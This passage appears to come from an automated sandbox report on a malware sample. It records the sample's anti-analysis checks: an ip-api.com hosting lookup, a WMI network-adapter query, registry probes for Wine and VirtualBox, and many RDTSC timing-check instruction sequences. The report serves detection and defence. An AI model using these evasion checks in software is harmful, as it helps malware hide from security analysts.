Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\47SXvEQ.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106B089 second address: 106B092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106A400 second address: 106A40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106A40D second address: 106A422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC8Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106A572 second address: 106A577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106A577 second address: 106A594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F87BD02CC97h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106A594 second address: 106A59E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F87BC5165B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106A59E second address: 106A5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F87BD02CC86h 0x0000000d jnl 00007F87BD02CC86h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106A5BC second address: 106A5C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D1F5 second address: 106D216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F87BD02CC90h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jp 00007F87BD02CC86h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D216 second address: 106D234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F87BC5165C0h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D234 second address: 106D26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F87BD02CC86h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F87BD02CC99h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F87BD02CC8Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D26B second address: 106D29C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F87BC5165BAh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D29C second address: 106D2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D3B9 second address: 106D3E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+12DC3387h] 0x00000011 push 00000000h 0x00000013 sub si, 9630h 0x00000018 push 8F993949h 0x0000001d push eax 0x0000001e push edx 0x0000001f jl 00007F87BC5165B8h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D3E0 second address: 106D42B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F87BD02CC94h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 7066C737h 0x00000014 stc 0x00000015 push 00000003h 0x00000017 mov edx, dword ptr [ebp+12DC316Ch] 0x0000001d push 00000000h 0x0000001f mov edi, esi 0x00000021 push 00000003h 0x00000023 mov esi, dword ptr [ebp+12DC343Bh] 0x00000029 push A20FF654h 0x0000002e jl 00007F87BD02CC92h 0x00000034 jp 00007F87BD02CC8Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D42B second address: 106D46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 add dword ptr [esp], 1DF009ACh 0x0000000b movzx esi, si 0x0000000e lea ebx, dword ptr [ebp+12F49E17h] 0x00000014 mov dword ptr [ebp+12DC1DCAh], eax 0x0000001a xchg eax, ebx 0x0000001b push ecx 0x0000001c jns 00007F87BC5165C6h 0x00000022 jmp 00007F87BC5165C0h 0x00000027 pop ecx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F87BC5165BCh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D46D second address: 106D485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106D485 second address: 106D489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108F285 second address: 108F28C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108F28C second address: 108F292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108D10B second address: 108D121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F87BD02CC86h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108D121 second address: 108D12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 popad 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108D3DB second address: 108D3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108DAB1 second address: 108DAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108DAB5 second address: 108DAB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108DAB9 second address: 108DB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F87BC5165CCh 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007F87BC5165CCh 0x00000014 jmp 00007F87BC5165C6h 0x00000019 je 00007F87BC5165BCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108DDB5 second address: 108DDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F87BD02CC86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108DDBF second address: 108DDDB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F87BC5165BBh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108DF81 second address: 108DF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108DF87 second address: 108DFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F87BC5165B6h 0x0000000d jmp 00007F87BC5165BCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1085388 second address: 108539A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F87BD02CC8Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108539A second address: 10853BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F87BC5165C9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10853BA second address: 10853CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F87BD02CC8Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10853CF second address: 10853EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F87BC5165B6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108E409 second address: 108E41D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F87BD02CC8Bh 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108E9B3 second address: 108EA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F87BC5165C2h 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F87BC5165B6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F87BC5165BAh 0x0000001b jmp 00007F87BC5165C2h 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jng 00007F87BC5165BEh 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108EA02 second address: 108EA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108EA09 second address: 108EA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108EA10 second address: 108EA20 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F87BD02CC8Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108EA20 second address: 108EA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108EB61 second address: 108EB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108ECDA second address: 108ECDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108ECDE second address: 108ECE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108ECE4 second address: 108ECEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F87BC5165B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1054E86 second address: 1054E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1054E8A second address: 1054E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1054E90 second address: 1054E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F87BD02CC98h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1054E9F second address: 1054EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108F0F7 second address: 108F108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jnp 00007F87BD02CC9Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 108F108 second address: 108F114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1094CA3 second address: 1094CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1094CA7 second address: 1094CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F87BC5165BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1094CB9 second address: 1094CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1094E01 second address: 1094E21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F87BC5165BAh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F87BC5165C4h 0x00000012 pushad 0x00000013 jg 00007F87BC5165B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1094E21 second address: 1094E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jl 00007F87BD02CC86h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10936DC second address: 10936E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10936E3 second address: 10936E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109AAE8 second address: 109AAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109AAEC second address: 109AAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
